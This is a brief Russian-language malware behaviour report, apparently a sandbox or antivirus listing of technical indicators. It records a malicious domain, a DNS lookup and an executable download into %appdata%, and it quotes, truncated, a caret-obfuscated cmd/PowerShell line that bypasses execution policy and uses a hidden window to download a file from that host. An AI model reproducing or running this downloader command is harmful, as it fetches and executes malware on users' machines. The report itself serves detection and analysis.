Техническая информация
- http://www.fapoergol.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^oWe^rSHell^.EXe -^E^x^eC^ut^ioN^po^liCy^ BYpA^ss -Nop^ROf^ILe -^W^indO^Ws^Ty^lE ^hiD^De^N (n^E^w-obj^ec^t ^sYsTEm.nEt^.^WEBcLIe^N^T).^DO^w^Nl^o^ad^F^ile^(^'http://www.fap...
- DNS ASK fa###rgol.top
- '<SYSTEM32>\cmd.exe' /c "p^oWe^rSHell^.EXe -^E^x^eC^ut^ioN^po^liCy^ BYpA^ss -Nop^ROf^ILe -^W^indO^Ws^Ty^lE ^hiD^De^N (n^E^w-obj^ec^t ^sYsTEm.nEt^.^WEBcLIe^N^T).^DO^w^Nl^o^ad^F^ile^(^'http://www.fap...' (со скрытым окном)